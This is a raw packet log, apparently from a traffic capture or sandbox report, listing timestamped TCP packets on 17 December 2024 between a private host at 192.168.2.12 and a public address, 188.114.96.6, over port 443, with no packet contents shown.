                                                                        Dec 17, 2024 08:38:43.665262938 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.665282011 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.665374041 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.665379047 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.665446997 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.669109106 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.669128895 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.669202089 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.669218063 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.669300079 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.831970930 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.831998110 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.832144022 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.832155943 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.832597017 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.835787058 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.835807085 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.835952044 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.835952044 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.835958958 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.839631081 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.839659929 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.839725971 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.839725971 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.839731932 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.839780092 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.844440937 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.844465971 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.844538927 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.844544888 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.844602108 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.848223925 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.848241091 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.848313093 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.848319054 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.848366022 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.853049040 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.853068113 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.853172064 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.853179932 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.853516102 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.857429028 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.857445955 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.857563972 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.857568979 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.857681036 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.861331940 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.861363888 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.861546040 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:43.861553907 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:43.861601114 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.024167061 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.024192095 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.024288893 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.024301052 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.024375916 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.027996063 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.028016090 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.028137922 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.028147936 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.028588057 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.032721996 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.032741070 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.032829046 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.032835960 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.032877922 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.036633015 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.036652088 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.036717892 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.036724091 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.036870003 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.040430069 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.040446997 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.040538073 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.040544987 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.040672064 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.045265913 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.045281887 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.045370102 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.045377016 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.045439005 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.049629927 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.049645901 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.049995899 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.050007105 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.050112963 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.053473949 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.053489923 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.053580999 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.053589106 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.053714037 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.216255903 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.216274023 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.216422081 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.216438055 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.216573000 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.220062971 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.220078945 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.220350981 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.220359087 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.220448971 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.224843979 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.224870920 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.224950075 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.224956989 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.225004911 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.225004911 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.228734970 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.228754997 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.228991032 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.228996992 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.229161978 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.232513905 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.232533932 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.232644081 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.232652903 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.232687950 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.237319946 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.237340927 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.237436056 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.237447977 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.237560987 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.241734028 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.241755962 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.241899967 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.241910934 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.242126942 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.245560884 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.245578051 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.245805979 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.245819092 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.246099949 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.408476114 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.408493042 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.408592939 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.408592939 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.408607006 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.408684969 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.412261963 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.412278891 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.412326097 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.412333012 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.412374973 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.412380934 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.417021990 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.417042971 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.417118073 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.417128086 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.417136908 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.417212963 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.420896053 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.420912027 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.420980930 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.420998096 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.421077013 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.425632954 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.425649881 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.425721884 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.425731897 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.425894976 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.429503918 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.429521084 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.429577112 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.429584026 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.429627895 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.429629087 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.433922052 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.433943987 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.434051037 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.434060097 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.434108973 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.437792063 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.437808037 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.437936068 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.437942982 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.438007116 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.600430965 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.600455999 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.600568056 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.600584984 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.600626945 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.604955912 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.604971886 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.605063915 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.605074883 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.605334997 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.608880997 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.608901978 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.608968019 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.608975887 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.609041929 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.609041929 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.613590002 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.613605976 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.613814116 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.613825083 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.613986969 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.617399931 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.617413998 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.617538929 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.617547989 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.617769003 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.622109890 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.622124910 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.622203112 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.622211933 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.622271061 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.626630068 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.626646042 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.626758099 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.626766920 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.626820087 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.630475998 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.630494118 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.630537987 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.630547047 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.630599022 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.630599022 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.792892933 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.792912960 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.792977095 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.792998075 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.793015957 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.793049097 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.796695948 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.796711922 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.796812057 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.796821117 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.796900988 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.801515102 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.801531076 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.801593065 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.801601887 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.801613092 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.801642895 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.805294991 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.805310011 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.805351973 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.805361032 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.805408955 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.805408955 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.810210943 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.810235977 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.810347080 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.810353041 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.810714960 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.814560890 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.814589024 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.814646959 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.814655066 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.814727068 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.814752102 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.818406105 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.818423986 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.818525076 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.818525076 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.818532944 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.818607092 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.823436975 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.823467016 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.823544025 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.823544025 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.823553085 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.823689938 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.985580921 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.985609055 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.985726118 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.985726118 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.985738993 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.985968113 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.989356995 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.989381075 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.989428043 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.989438057 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.989479065 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.989479065 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.994040966 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.994059086 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.994147062 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.994147062 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.994153976 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.994191885 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.997994900 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.998012066 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.998054028 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:44.998073101 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:44.998130083 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.002665997 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.002681971 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.002722979 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.002731085 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.002823114 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.002880096 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.006601095 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.006618023 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.006694078 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.006694078 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.006700993 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.006783009 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.011013985 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.011033058 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.011076927 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.011086941 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.011127949 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.011127949 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.014847994 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.014867067 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.014908075 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.014914036 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.014946938 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.015027046 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.177654028 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.177684069 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.177906990 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.177920103 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.177969933 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.181467056 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.181485891 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.181555986 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.181565046 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.181593895 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.181694031 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.186113119 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.186131954 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.186207056 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.186218023 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.186319113 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.190027952 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.190052986 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.190162897 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.190162897 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:45.190171957 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:45.190529108 CET49716443192.168.2.12188.114.96.6
